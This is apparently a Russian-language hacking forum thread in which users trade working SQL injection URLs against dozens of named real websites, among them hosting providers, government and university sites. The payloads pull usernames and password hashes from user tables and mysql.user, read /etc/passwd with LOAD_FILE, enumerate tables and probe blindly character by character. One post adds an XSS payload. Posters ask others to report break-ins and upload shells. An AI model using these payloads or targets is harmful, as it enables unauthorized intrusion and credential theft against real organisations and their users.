Все - хостинги, из двух последних - один из них - реселлер valuehost'а, а второй прямо в той же базе, что и valuehost, так что не мудрено взломать и сам valuehost.ru

http://fotokatalog.ru/index.php?pp=25+union+select+1/*&from=50

Incorrect usage of UNION and ORDER BY
ЧТо это?
P.S. 2 Macros http://hoster.od.ua/hosting/hosting_faq.php?news_id=1+union+select+concat(id,c har(58),user,char(58),pass,char(58,32,32,32),right s,char(58),rname,char(58),mail,char(58),char(58),e ditor)%20,concat(char(83,101,115,115,105,111,110,5 8,32),sess)+from+login/*
Супер, а у меня вчера ничего не получилось...

http://fotokatalog.ru/index.php?pp=25+union+select+1/*&from=50

Incorrect usage of UNION and ORDER BY
ЧТо это?
Там данные из переменной pp подставляются в order by, а данные из переменной from - в limit. Так что ни хрена не получится. Он всегда тебе будет выдавать ошибку, видимо там ORDER BY $pp LIMIT $from,25

Лень самому возиться с взломом... Сам нашел все...

http://hoster.od.ua/hosting/hosting_faq.php?news_id=1+union+select+1,user()/*
http://www.all4hosting.ru/index.asp?idSort=3&idPage=1+union+select+1,2,3--
http://www.ht-systems.ru/events/news.php?ID=4+union+select+1,2,3,4,LOAD_FILE('/etc/passwd'),6/*
http://aho.ru/hosting/tarifs.php?tgroup=2+union+select+1,2,3/*
http://uptime.ru/content.php?what=preleases&id=-1+union+select+1,login,password,4,5,6,7+from+users +limit+1,3/*
http://ivanhost.ru/?p=18&a=-3+union+select+USER(),DATABASE()/*
http://order.besthost.ru/order/index.php?hmid=-1+union+select+1,2,3,4,5,6,7,LOAD_FILE('/etc/passwd'),9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26/*

Все - хостинги, из двух последних - один из них - реселлер valuehost'а, а второй прямо в той же базе, что и valuehost, так что не мудрено взломать и сам valuehost.ru
Если кто-нибудь что-нибудь из этого взломает - отпишитесь пожалуйста, хоть в личку :)

Всех с 2007-мым годом и Скуль на allpeople.ru

http://www.allpeople.ru/chital.php?read=-2+union+select+1,2,3,4,concat(login,char(3),pas),D ATABASE(),7,8,9,10+from+people+where+id=[Нужный вам id]/*

Если кто-нибудь что-нибудь из этого взломает - отпишитесь пожалуйста, хоть в личку :)
http://hoster.od.ua
http://uptime.ru
http://www.ht-systems.ru
- баян =\
Давно хекал =\
"Если кто-нибудь что-нибудь из этого взломает - отпишитесь пожалуйста, хоть в личку " - для чего? ;)

http://www.belize.gov.bz/doc_center_directory_listings.php?folder_id=-99+union+select+1,2,concat(username,0x3a,password) ,4+from+users+limit+0,1/*
;)

http://climate.gsfc.nasa.gov/viewPaperAbstract.php?id=-99+union+select+1,2,3,4,5,6,7,8,table_name,10,11,1 2+from+INFORMATION_SCHEMA.TABLES+limit+0,1/*

http://ase.arc.nasa.gov/tech/groups/index.php?ta=4&gid=-99'+union+select+1,table_name,3,4,convert('asd'%20 using%20utf8),6,7,8,9+from+INFORMATION_SCHEMA.TABL ES/*

Дальше юзать не стал, некогда =\

_http://www.magverlag.com/offshore_news/news.php?page=0&news=-1+UNION+SELECT+null,null,concat(email,char(58),ip) ,null,null,null,null,null,null+from+emails/*

http://www.rabota.su/voting/stat.php?id=-99+union+select+1,concat(login,0x3a,pwd),3+from+us ers+limit+0,1/*
;) gl

Так тут всё серьёзно:) Вот, с утра нашёл:
MySQL 4.0.18:
http://news.numizmatik.ru/read.php?news=-2566+union+select+1,2,3,4,5,6,7,8/*
-----
MySQL 4.0.27:
http://www.jerusalemsummit.org/eng/news.php?news=-102+union+select+1,2,3,4,5,6,7,8,9,10/*
-----
MySQL 4.1.20:
http://whtt.org/index.php?news=2&id=-1103+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
-----
MySQL 4.0.21:
http://expodessa.od.ua/conference/site.php/news?id=-1+union+select+1,2,3/*
-----
MySQL 4.1.21:
http://www.falungonginfo.net/display.php?news=-1+union+select+1,2,3,4,5,6/*
-----
MySQL ------
http://www.simpleinvoices.org/index.php?news=-1+union+select+1,2,3,4,5/*
-----

Сегодня делать определённо нечего:)
MySQL 4.0.20a:
http://www.apahelpcenter.org/featuredtopics/feature.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
-----
MySQL 5.0.24a:
http://www.ipecac.com/bio.php?id=-1+union+select+1,2,3,4/*
-----
MySQL -------
http://www.keckobservatory.org/article.php?id=-87+union+select+1,2,3,4,5,6,7,8/*
-----

MySQL ------
http://www.virtualworldlets.net/Archive/IndividualNews.php?News=-1047+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
-----
MySQL 4.0.25:
http://www.fitness.ru/clubs/timetable.phtml?ClubID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19/*
-----

http://www.liteforex.net/index.php?page=tools.php&cat=-99+union+select+1,username,3,4,5,6,7,8,9+from+phpb b_users/*
и т.д. ;)
+там в параметре 'page' вроде бы инклуд .) - но я не стал заморачиваться :)

http://www.allse.ru/profile.php?lookup=-1+union+select+table_name+from+INFORMATION_SCHEMA. TABLES+limit+0,1/*
P.S.: смотреть title .)

http://www.impactsoft.ru/clients.php?razdel_id=1+union+select+1,AES_DECRYPT (%20AES_ENCRYPT(user(),0x71),0x71),3,4,5,6,7,8,9/*
Компания «Импакт-Софт» существует на рынке информационных технологий 13 лет
O_o :p

http://www.slavneft.ru/press/info.php?id=-999+union+select+1,2,3,4,5,6,7,8,9/*
ОАО "НГК "Славнефть"" :)

http://www.promtractor.ru/products_show.php?section=9&id=75'

Тракторы =)

http://ru-board.com/new/article.php?sid=-99+union+select+1,2,3,concat(user(),' O_o ','preved'),5,6,7,8,9,10/*
;)

http://job.ukr.net/viewvac/view_IDvac.php?vid='+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,email,password,19,20,21,22, 23,24,25,26,27,28,29,30,31+from+members+limit+1000 ,1/*
мемберов с пассами не меньше тысячи О_о

http://uvm.edu/theview/article.php?id=-2043+union+select+1,database(),3,4,user(),6,7/*

http://daninvest.by/id_3/product.php?id=5555%20union%20select%201,DATABASE( ),3,4,5,6,7,8/*

http://www.advance-acoustic.com/fr-product.php?id=-4%20union%20select%201,2,3,4,DATABASE(),6,7,3,8,9, 10/*

http://www.puppetshowbooks.com/product.php?id=-5'

http://www.standard.md/product.php?l=ro&id=-5'%20union%20select%201,table_name%20from+INFORMAT ION_SCHEMA.TABLES+limit+3,4/*

http://www.clasp.org/publications.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*

http://www.worstpreviews.com/review.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40/*

http://www.karlcore.com/articles/article.php?id=-1+union+select+1,2,USER(),4,VERSION(),6/*

http://www.splav.kharkov.com/mat_start.php?name_id=-1+union+select+CHAR(207,208,197,194,197,196,32,204 ,197,196,194,197,196,33)/*

СтЭнфорд ))
http://art.stanford.edu/bio.php?name_id=-1+union+select+1,2,3,4,user,6,7,8,9,10,11,12,13,14 ,15,password,17,18,19+from+mysql.user/*

http://atvmarket.ru/select.php?cat=-1+union+select+version(),3/*


http://www.ecoross.ru/persons.php?name_id=-1+union+select+user(),2,CHAR(198,232,240,232,237,2 38,226,241,234,232,233,32),4,5,6,7,8,9,10,11,12,13 ,14/*

http://mir-tech.ru/group.php?cat=-1+union+select+CHAR(193,229,199,239,192,237,210,23 8,194,251,201,32,204,224,195,224,199,232,205,33)/*

http://fanats.ru/?n_id=-1+union+select+1,2,email,555,5+from+user+limit+3,3/*


http://www.websib.ru/new_detail.php?new_id=-1+union+select+user,password,1+from+mysql.user/*

http://bbq-grilling-recipes.com/recipe.php?recipeid=-1+union+select+0,concat(userid,0x3a,login,0x3a,pas sword,0x3a,email)+from+users+limit+1,1/*


ps это двиг.
/siteadmin/addad.php?groupid=4

http://filmmakers.node9.org/author.php?name_id=-5'%20union%20select%201,VERSION(),3,4,5,6,0,6,DATA BASE(),USER(),9/*
помогите с table informations =(

http://www.a1tv.ru/AOpenBands.php?Band=-1+union+select+null,2,concat(memberName,char(58),p asswd,char(58),PasswordSalt),4,5+from+smf_members/*
A-ONE

http://user.kz/files/cifry.php?sid=23692+union+select+null,null,null,nu ll,null,null,null/* Вот только обидно не выводится не чего из таблици;(

P.S. просто из-за внемательности
http://user.kz/files/cifry.php?sid=2+union+select+1,2,99999,4,5,7,8/*
вот только косяк в том, что из базы беруться цифры и потому уже идет генерация ресунка, т.е цифры служат именами для файлов, там уже не чего нельзя сделать!

http://user.kz/files/cifry.php?sid=23692+union+select+null,null,null,nu ll,null,null,null/* Вот только обидно не выводится не чего из таблици;(
перебирай
http://user.kz/files/cifry.php?sid=23698+and((ascii(substring(user(),1, 1)))>1)
http://user.kz/files/cifry.php?sid=23698+and((ascii(substring(user(),1, 1)))>100)

перебирай
http://user.kz/files/cifry.php?sid=23698+and((ascii(substring(user(),1, 1)))>1)
http://user.kz/files/cifry.php?sid=23698+and((ascii(substring(user(),1, 1)))>100)
НЕ люблю по символьный перебор потом дам тебе имя таблиц, а то не помню куда закул их, потом выложишь http://forum.antichat.ru/thread28658.html

http://keep4u.ru/album.php?view=-1'+union+select+1,2,322,4+from+mysql.user/*
Правда не чего интересно!

http://www.vkks.ru/second.php?columnValue=-99+union+select+convert(concat(user,0x3a,password) using%20cp1251),2+from+mysql.user/*
Высшая квалификационная коллегия судей
Российской Федерации :D

http://www.ugd-soft.ru/?mode=press&id=-1+union+select+1,2,3,4/*

http://www.worthplaying.com/article.php?sid=-1+union+select+1,2,pass,4,name,6,7,111+from+users/*

Чють Чють не ф тему но там же
http://www.worthplaying.com/user.php?op=userinfo&uname=7'%3Cscript%3Ealert()%3C/script%3E

2Diagen почему же =) можно поля поискать.. не зря таблица юзеры называется..

+ раньше был локал инклуд .. сейчас хз

http://keep4u.ru/album.php?view=-1'+union+select+1,2,convert(user()+using+cp1251),4 +from+users/*

http://www.microchip.by/info.php?id=999999999999+union+select+1,2,3,4,5/*

http://www.j2g.ru/show.php?id=999999999999+union+select+1,mysql.user .password,3,4,DATABASE(),6,7,8,9,10,11+from+%20%20 %20%20mysql.user+limit+0,1/*
http://www.webdoski.ru/show.php?sn=999999999999+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
http://pmed.ru/conf/index.php?id=999999999999+union+select+1,2,3,4,5,6 ,7,8,9,10,11/*

hostobzor.ru
http://www.hostobzor.ru/db/vds.php?pid=-1+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(TABLE_NAME, 0x71),0x71),1,22+from+INFORMATION_SCHEMA.TABLES+li mit+32,1/*


ps наркоманы надо было так таблицы назвать...

(если кто шелл зальет, напишите в PM, Please...)
http://www.pinskdrev.by/forum.php?page=1&theme_id=-1+UNION+SELECT+1,2,3,4,5+from+news/*&action=show_theme

http://www.wmast.com.ua/web/articles.php?clause=-1+union+select+11111,22222/*

http://www.odyssey.od.ua/show.php?cat=pccdrom&id=999999999999+union+select+1,mysql.user.password ,3,4,5+from+mysql.user+limit+0,1/*

http://www.evroutro.ru/index.php?pg=konkurs_izbr&id=-1+union+select+1,user(),version(),5/*

http://samsungpro.ru/programms/?content=browse&id=327+union+select+1,2,3,4,0x707265766564203a44/*

Ужас

http://karabin.com.ua/rus/news.php?news_id=1'

http://www.trud.ru/issue/news.php?id=-99+union+select+1,2,3,'preved :D',5,6,7/*
;)